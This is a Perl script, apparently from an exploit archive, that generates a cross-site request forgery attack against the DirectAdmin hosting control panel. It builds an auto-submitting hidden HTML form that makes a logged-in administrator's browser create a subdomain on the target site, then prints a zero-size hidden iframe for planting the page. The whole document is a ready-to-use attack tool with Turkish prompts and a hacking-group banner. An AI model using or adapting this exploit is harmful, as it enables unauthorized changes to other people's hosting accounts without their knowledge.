DirectAdmin add sub domain cross site request forgery exploit.
3126a7db0cacf9a7ea7277fca0aac616368fc4d14bc2cc4c2fab71fb9a97832f
#!/usr/bin/perl
########################################################################
# Title : DirectAdmin Web Control Panel � 2005 JBMC Software
# Author : Onur T�RKE�HAN
# Homepage : http://www.directadmin.com/
# tested on : Windows 7
# Seni Unutmayacagiz MIRIM-
system("cls");
print
"
+----------------------------------------+\n
| directadmin csrf vuln creator by turkeshan |\n
| cyber-warrior.org lojistik grup |\n
+----------------------------------------+\n
Loading ...\n
";
sleep(3);
print "Site aDi ";
$h = <STDIN>;
chomp $h;
print "Sub Domain Adi ";
$sub = <STDIN>;
chomp $usub;
$html = '<form name=info action="http://'.$h.':2222/CMD_SUBDOMAIN?domain='.$h.'" method="POST">
<input type=hidden name=action value="create">
<input type=hidden name=domain value="'.$h.'">
<input type=text name=subdomain size=8 value="'.$sub.'">
<script>document.info.submit();</script>
</form>';
sleep(2);
print "olusturuluyor ...\n";
open(XSS , '>>csrf.htm');
print XSS $html;
close(XSS);
print "olusturuldu .. \n";
sleep(2);
print "dosyayi sitenize upload edin ve dosya ismini yazin";
$csrf = <STDIN>;
chomp $csrf;
$done = '<iframe id="iframe" src="'.$csrf.'" width="0" height="0"></iframe>';
sleep(2);
print "exploit basariyla tamamlandi \n";
print $done."\n";
print "";
print "\n hayrini gorun .. ";